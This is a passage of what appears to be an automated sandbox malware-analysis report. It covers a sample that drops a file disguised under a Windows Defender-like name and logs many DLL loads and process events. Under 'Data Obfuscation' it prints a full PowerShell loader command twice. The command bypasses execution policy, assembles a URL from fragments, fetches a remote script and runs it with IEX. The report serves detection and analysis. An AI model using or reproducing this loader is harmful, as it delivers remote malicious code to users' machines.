            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: DBp7mBJwqD.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: DBp7mBJwqD.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: DBp7mBJwqD.exeStatic file information: File size 14848000 > 1048576
            Source: DBp7mBJwqD.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x717000
            Source: DBp7mBJwqD.exeStatic PE information: Raw size of .svm_hea is bigger than: 0x100000 < 0x6f0000
            Source: DBp7mBJwqD.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: DBp7mBJwqD.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

            Data Obfuscation

            barindex
            Suspicious powershell command line found
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$AI='https://'; $mode='api'; $update='tradingview.com/'; $dev='ermando1'; $beta='.txt'; $charts=$AI+$mode+$update+$dev+$beta; $userAgent='TradingView'; $Response=Invoke-WebRequest -Uri $charts -UseBasicParsing -UserAgent $userAgent; $Script=[System.Text.Encoding]::UTF8.GetString($Response.Content); IEX $Script"Jump to behavior
            Source: DBp7mBJwqD.exeStatic PE information: section name: .rodata
            Source: DBp7mBJwqD.exeStatic PE information: section name: .svm_hea
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DEAD2A5 pushad ; iretd 8_2_00007FFE7DEAD2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC5468 pushad ; iretd 8_2_00007FFE7DFC5469
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC752B push ebx; iretd 8_2_00007FFE7DFC756A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC55DB push ecx; iretd 8_2_00007FFE7DFC55DC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC35F7 push eax; iretd 8_2_00007FFE7DFC3681
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC00BD pushad ; iretd 8_2_00007FFE7DFC00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7DFC7963 push ebx; retf 8_2_00007FFE7DFC796A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFE7E09617F push es; ret 8_2_00007FFE7E096187
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeCode function: 10_2_00007FFE7DFC00BD pushad ; iretd 10_2_00007FFE7DFC00C1
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeCode function: 10_2_00007FFE7DFC558C push ebp; ret 10_2_00007FFE7DFC5598
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeCode function: 10_2_00007FFE7DFC5623 push esp; ret 10_2_00007FFE7DFC562B
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\WDSecureUtilities_548.exeFile created: :newads (copy)Jump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
